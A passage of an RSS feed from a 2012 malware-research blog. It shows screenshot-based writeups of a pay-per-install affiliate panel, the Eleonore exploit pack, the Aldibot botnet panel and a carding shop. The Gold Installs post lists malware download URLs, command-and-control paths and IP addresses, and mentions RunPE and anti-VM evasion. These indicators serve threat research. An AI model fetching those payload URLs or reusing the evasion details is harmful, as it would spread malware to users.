/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;EXE:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Dx67QVuBYGI/T7yDL5tB9FI/AAAAAAAAGJo/QzyFmmrlkz0/s1600/3.exe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-Dx67QVuBYGI/T7yDL5tB9FI/AAAAAAAAGJo/QzyFmmrlkz0/s400/3.exe.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;AV test (FUD):&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-cOXLKT6EmNg/T7yDR6cnuAI/AAAAAAAAGJw/cF5wTF_HQeo/s1600/avtest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="317" src="http://1.bp.blogspot.com/-cOXLKT6EmNg/T7yDR6cnuAI/AAAAAAAAGJw/cF5wTF_HQeo/s400/avtest.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Withdraw:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-96RF6oH8poE/T7yDfGlDDQI/AAAAAAAAGJ4/WVAEZSNoPpI/s1600/5.withdraw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-96RF6oH8poE/T7yDfGlDDQI/AAAAAAAAGJ4/WVAEZSNoPpI/s400/5.withdraw.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Profile:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-vFKXdkNruIQ/T7yFaM3UWmI/AAAAAAAAGKw/SrxDAabyA7Y/s1600/6.Profile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-vFKXdkNruIQ/T7yFaM3UWmI/AAAAAAAAGKw/SrxDAabyA7Y/s400/6.Profile.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;FAQ:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-uKaFqxCt_w4/T7yFPrvA0YI/AAAAAAAAGKo/CWud-SIgiGU/s1600/7.FAQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="235" src="http://3.bp.blogspot.com/-uKaFqxCt_w4/T7yFPrvA0YI/AAAAAAAAGKo/CWud-SIgiGU/s400/7.FAQ.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;0/42 according to VT:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-v_h2-cxECe8/T7yFvgOPAII/AAAAAAAAGK4/xzwI-kc9w0c/s1600/FUD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="112" src="http://4.bp.blogspot.com/-v_h2-cxECe8/T7yFvgOPAII/AAAAAAAAGK4/xzwI-kc9w0c/s400/FUD.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The EXE downloaded from the panel "653b009465_127_u.exe" is a downloader/loader with a primitive RunPE and some anti-vm:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-zO5GbBCFprI/T7yMmytP6nI/AAAAAAAAGLY/o4hI7ZvhcrQ/s1600/paked.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="397" src="http://4.bp.blogspot.com/-zO5GbBCFprI/T7yMmytP6nI/AAAAAAAAGLY/o4hI7ZvhcrQ/s400/paked.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;Download files:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-CfrLwoC6wRA/T7yJCmKxVyI/AAAAAAAAGLE/lttZ6cMcdQU/s1600/downloader_unpacked.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-CfrLwoC6wRA/T7yJCmKxVyI/AAAAAAAAGLE/lttZ6cMcdQU/s400/downloader_unpacked.PNG" width="333" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Downloaded file 'id.exe' is just here to update gold installs statistic:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-2wz_SGPYWs8/T7yJ_tbljGI/AAAAAAAAGLM/heCI6dg58Dc/s1600/id.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-2wz_SGPYWs8/T7yJ_tbljGI/AAAAAAAAGLM/heCI6dg58Dc/s400/id.png" width="252" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;'sm.exe' is a Smoke Bot and for asd.exe the file don't exist on the server...&lt;br /&gt;&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;• dns: 1 ›› ip: 91.218.38.153 - adresse: GAMEFANS.EU&lt;br /&gt;• dns: 1 ›› ip: 91.218.38.153 - adresse: BCIOJEZTEUUEBX.IN&lt;br /&gt;http://bciojezteuuebx.in/syst/guest.php&lt;br /&gt;http://bciojezteuuebx.in/syst/control.php&lt;br /&gt;http://bciojezteuuebx.in/ftp/ppi/127/id.exe &lt;br /&gt;http://bciojezteuuebx.in/ftp/ppi/127/sm.exe &lt;br /&gt;http://bciojezteuuebx.in/asd.exe&lt;br /&gt;&lt;br /&gt;• dns: 1 ›› ip: 46.4.51.177 - adresse: GOLDINSTALLS.ORG&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-emLH7ko1V9M/T71b18WiFCI/AAAAAAAAGNM/TaNGt09jlyI/s1600/Asuka.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://4.bp.blogspot.com/-emLH7ko1V9M/T71b18WiFCI/AAAAAAAAGNM/TaNGt09jlyI/s400/Asuka.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;End of Eva... "what the f@#$ did i just watch?!"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-2563861059850484974?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/gold-installs-affiliate.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-7XILv-mAi-U/T7yEkx36kbI/AAAAAAAAGKY/cRyDVUCL8u0/s72-c/GoldInstalls.PNG" height="72" width="72" /><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-3965749977151789915</guid><pubDate>Sat, 19 May 2012 05:00:00 +0000</pubDate><atom:updated>2012-05-19T07:00:35.726+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eleonore Exploits pack v1.2</category><category domain="http://www.blogger.com/atom/ns#">ExManoize</category><category domain="http://www.blogger.com/atom/ns#">Eleonore</category><title>Eleonore Exploits pack v1.2</title><description>Found on MDL, Not really interesting but posting anyway.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-6KZrVBKAFQQ/T7a9dlqD3DI/AAAAAAAAGIY/0jX_lU1RMQQ/s1600/18-05-2012+23-21-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="365" src="http://1.bp.blogspot.com/-6KZrVBKAFQQ/T7a9dlqD3DI/AAAAAAAAGIY/0jX_lU1RMQQ/s400/18-05-2012+23-21-14.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-RrqlB8dev-s/T7a8V5P39_I/AAAAAAAAGHw/NUNzLtYyljU/s1600/18-05-2012+23-16-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-RrqlB8dev-s/T7a8V5P39_I/AAAAAAAAGHw/NUNzLtYyljU/s400/18-05-2012+23-16-54.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Paze189LyPc/T7a8k2dpYjI/AAAAAAAAGH4/WTBKRIGwukI/s1600/18-05-2012+23-17-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-Paze189LyPc/T7a8k2dpYjI/AAAAAAAAGH4/WTBKRIGwukI/s400/18-05-2012+23-17-47.png" width="365" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;iframe:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-BfvBNEc692g/T7a8w43g6vI/AAAAAAAAGIA/JGnvDHJZZlY/s1600/18-05-2012+23-18-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-BfvBNEc692g/T7a8w43g6vI/AAAAAAAAGIA/JGnvDHJZZlY/s400/18-05-2012+23-18-42.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Referer&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-SmIBtXDr2t8/T7a853hob_I/AAAAAAAAGII/Pe1T5JZd76I/s1600/18-05-2012+23-19-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-SmIBtXDr2t8/T7a853hob_I/AAAAAAAAGII/Pe1T5JZd76I/s400/18-05-2012+23-19-21.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Country:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-maGZtI6Xndk/T7a9MOYQ-2I/AAAAAAAAGIQ/e7noudCHeVs/s1600/18-05-2012+23-20-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-maGZtI6Xndk/T7a9MOYQ-2I/AAAAAAAAGIQ/e7noudCHeVs/s400/18-05-2012+23-20-29.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-YaJIwQzbE10/T7a_5Zegc3I/AAAAAAAAGIg/XtpkV3LbJ9I/s1600/upt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-YaJIwQzbE10/T7a_5Zegc3I/AAAAAAAAGIg/XtpkV3LbJ9I/s400/upt.jpg" width="283" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3965749977151789915?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/eleonore-exploits-pack-v12.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-6KZrVBKAFQQ/T7a9dlqD3DI/AAAAAAAAGIY/0jX_lU1RMQQ/s72-c/18-05-2012+23-21-14.png" height="72" width="72" /><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-6071480593196412373</guid><pubDate>Tue, 08 May 2012 23:34:00 +0000</pubDate><atom:updated>2012-05-09T01:38:56.746+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">HC Stealer</category><category domain="http://www.blogger.com/atom/ns#">TeamkNast</category><category domain="http://www.blogger.com/atom/ns#">Lamers</category><category domain="http://www.blogger.com/atom/ns#">Aldibot</category><title>Aldibot</title><description>Got this comment yesterday&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-Jot61s8Mujo/T6mSpnouTiI/AAAAAAAAGBg/9Z5UhtArZeg/s1600/08-05-2012+23-21-32.png" /&gt;&lt;/center&gt;&lt;br /&gt;Alright, let's give a shit.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Eq7XbF2aR_k/T6mSueyZT8I/AAAAAAAAGBo/akS-pP44T7E/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-Eq7XbF2aR_k/T6mSueyZT8I/AAAAAAAAGBo/akS-pP44T7E/s400/1.login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Stats: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-8niFf6Tgvws/T6mSyRLBgfI/AAAAAAAAGBw/QOimapOkGrE/s1600/2.stats.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="http://3.bp.blogspot.com/-8niFf6Tgvws/T6mSyRLBgfI/AAAAAAAAGBw/QOimapOkGrE/s400/2.stats.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bots: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-jG0Go7DxRpI/T6mTBV4OWxI/AAAAAAAAGCI/4J2cTL-Ht_c/s1600/3.bots.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-jG0Go7DxRpI/T6mTBV4OWxI/AAAAAAAAGCI/4J2cTL-Ht_c/s400/3.bots.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Tasks:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-L4BPxwttSuo/T6mTFnUNO9I/AAAAAAAAGCQ/OgboM-9XXAQ/s1600/4.tasks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-L4BPxwttSuo/T6mTFnUNO9I/AAAAAAAAGCQ/OgboM-9XXAQ/s400/4.tasks.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Logs: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-tg6G2KqYKM4/T6mS3Ir_hAI/AAAAAAAAGB4/XEn7YMYj-C8/s1600/5.logs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-tg6G2KqYKM4/T6mS3Ir_hAI/AAAAAAAAGB4/XEn7YMYj-C8/s400/5.logs.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Upload: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-msaLwxx3GkE/T6mS8n1fh3I/AAAAAAAAGCA/yLIXz6SGCFU/s1600/6.upload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-msaLwxx3GkE/T6mS8n1fh3I/AAAAAAAAGCA/yLIXz6SGCFU/s400/6.upload.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;HC Stealer 2.0.1:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/--g6yvFUqQgY/T6mTuW3vPOI/AAAAAAAAGCY/fri9dOeUApQ/s1600/keylog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/--g6yvFUqQgY/T6mTuW3vPOI/AAAAAAAAGCY/fri9dOeUApQ/s400/keylog.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-DNy7W7OewV4/T6mUM6340cI/AAAAAAAAGCg/nGOEVWDNBek/s1600/hc2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-DNy7W7OewV4/T6mUM6340cI/AAAAAAAAGCg/nGOEVWDNBek/s400/hc2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Lame page:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-FPWsGcdMYKY/T6mUuBvxtZI/AAAAAAAAGCo/_zDIWWYKoMI/s1600/deface.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-FPWsGcdMYKY/T6mUuBvxtZI/AAAAAAAAGCo/_zDIWWYKoMI/s400/deface.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-zzjdKep4p5w/T6muYBZ6WGI/AAAAAAAAGC0/0QH6hRoEFHw/s1600/1336489003460.jpg" /&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-6071480593196412373?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/aldibot.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-Jot61s8Mujo/T6mSpnouTiI/AAAAAAAAGBg/9Z5UhtArZeg/s72-c/08-05-2012+23-21-32.png" height="72" width="72" /><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-303267842329856823</guid><pubDate>Tue, 08 May 2012 08:53:00 +0000</pubDate><atom:updated>2012-05-08T10:59:03.991+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Paypal shop</category><category domain="http://www.blogger.com/atom/ns#">MyFullz</category><category domain="http://www.blogger.com/atom/ns#">Paypal</category><category domain="http://www.blogger.com/atom/ns#">PP</category><category domain="http://www.blogger.com/atom/ns#">Surething Team</category><category domain="http://www.blogger.com/atom/ns#">Credit Cards</category><category domain="http://www.blogger.com/atom/ns#">CC</category><category domain="http://www.blogger.com/atom/ns#">Digital Store</category><title>MyFullz.com (Credit Cards/Paypal shop)</title><description>&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-b9hIMoQIuO4/T6ZdbkGVSOI/AAAAAAAAF6k/q-0MbJ8iJP8/s1600/06-05-2012+13-15-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://2.bp.blogspot.com/-b9hIMoQIuO4/T6ZdbkGVSOI/AAAAAAAAF6k/q-0MbJ8iJP8/s400/06-05-2012+13-15-32.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Index:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-syWKaE9XDVY/T6ZY9q6OTGI/AAAAAAAAF4s/M-8dIzVqSe8/s1600/myfullz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-syWKaE9XDVY/T6ZY9q6OTGI/AAAAAAAAF4s/M-8dIzVqSe8/s400/myfullz.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Admin Dashboard:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ppm7EEB0hz0/T6ZZQR9NsEI/AAAAAAAAF40/EfjxjiEC97U/s1600/myfullz.com-dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-ppm7EEB0hz0/T6ZZQR9NsEI/AAAAAAAAF40/EfjxjiEC97U/s400/myfullz.com-dashboard.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Admin Settings:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-7JD08Vbgdrs/T6Zaucbm-HI/AAAAAAAAF48/zpq1Dfy4yas/s1600/myfullz.com-adminsettings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="288" src="http://2.bp.blogspot.com/-7JD08Vbgdrs/T6Zaucbm-HI/AAAAAAAAF48/zpq1Dfy4yas/s400/myfullz.com-adminsettings.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;About us:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-EUY9SOyYeMs/T6Za9V4AaSI/AAAAAAAAF5E/qe2mZ2VONog/s1600/myfullz.com-about.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-EUY9SOyYeMs/T6Za9V4AaSI/AAAAAAAAF5E/qe2mZ2VONog/s400/myfullz.com-about.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Manage Categories:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-IfLENeuo_zI/T6ZbKYIx2VI/AAAAAAAAF5M/Kn4UBW7DHZo/s1600/myfullz.com-managecategory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-IfLENeuo_zI/T6ZbKYIx2VI/AAAAAAAAF5M/Kn4UBW7DHZo/s400/myfullz.com-managecategory.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Manage Products: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-TqRSHfs5Xr0/T6ZbLYTuUJI/AAAAAAAAF5U/Annyeq9gf4Y/s1600/myfullz.com-manageproduct.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="271" src="http://4.bp.blogspot.com/-TqRSHfs5Xr0/T6ZbLYTuUJI/AAAAAAAAF5U/Annyeq9gf4Y/s400/myfullz.com-manageproduct.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Add news:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-57ErShCGnHo/T6ZbY6-BzjI/AAAAAAAAF5c/N8Mrz83WEeo/s1600/myfullz.com-addnews.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-57ErShCGnHo/T6ZbY6-BzjI/AAAAAAAAF5c/N8Mrz83WEeo/s400/myfullz.com-addnews.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Add FAQ: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/--PKbq5ovanM/T6ZbZzZRAeI/AAAAAAAAF5k/tjemWBuTY7g/s1600/myfullz.com-faq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/--PKbq5ovanM/T6ZbZzZRAeI/AAAAAAAAF5k/tjemWBuTY7g/s400/myfullz.com-faq.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Send Email To All Buyers: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-jMDFd3fH3-c/T6Zba0K5WGI/AAAAAAAAF5s/QRHFOmYDdEQ/s1600/myfullz.com-sendmail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-jMDFd3fH3-c/T6Zba0K5WGI/AAAAAAAAF5s/QRHFOmYDdEQ/s400/myfullz.com-sendmail.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Send a product manually: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-rzg1-gAc4I4/T6ZbcaSktrI/AAAAAAAAF50/6odU7dAnnCA/s1600/myfullz.com-sendprodyct.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-rzg1-gAc4I4/T6ZbcaSktrI/AAAAAAAAF50/6odU7dAnnCA/s400/myfullz.com-sendprodyct.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Add therms and conditions: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-qX_C3XIIJ9A/T6ZbdLM20DI/AAAAAAAAF58/9TsCpqfHmkU/s1600/myfullz.com-terms.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-qX_C3XIIJ9A/T6ZbdLM20DI/AAAAAAAAF58/9TsCpqfHmkU/s400/myfullz.com-terms.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sales summary:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-0F-WGoV7UDg/T6Zb_NE2YPI/AAAAAAAAF6E/h2M6_-1yu_E/s1600/myfullz.com-sales.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-0F-WGoV7UDg/T6Zb_NE2YPI/AAAAAAAAF6E/h2M6_-1yu_E/s400/myfullz.com-sales.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sales Details 1: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-LBgYfADhZl4/T6Zb_6ltIEI/AAAAAAAAF6M/vPMofwtVbhY/s1600/myfullz.com-sales2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="339" src="http://4.bp.blogspot.com/-LBgYfADhZl4/T6Zb_6ltIEI/AAAAAAAAF6M/vPMofwtVbhY/s400/myfullz.com-sales2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sales Details 2: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-wWUq3qX-Dys/T6ZcA6qztgI/AAAAAAAAF6U/CKnJB-flCHU/s1600/myfullz.com-sales3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" src="http://3.bp.blogspot.com/-wWUq3qX-Dys/T6ZcA6qztgI/AAAAAAAAF6U/CKnJB-flCHU/s400/myfullz.com-sales3.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sales Details 3:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-9QhdURdDpTc/T6ZcB1F1CaI/AAAAAAAAF6Y/M9cuAalqVvw/s1600/myfullz.com-sales4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-9QhdURdDpTc/T6ZcB1F1CaI/AAAAAAAAF6Y/M9cuAalqVvw/s400/myfullz.com-sales4.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I'm not bad enought to share the user table, anyway enjoy this: &lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/9Nqn9jJShFg" width="420"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' 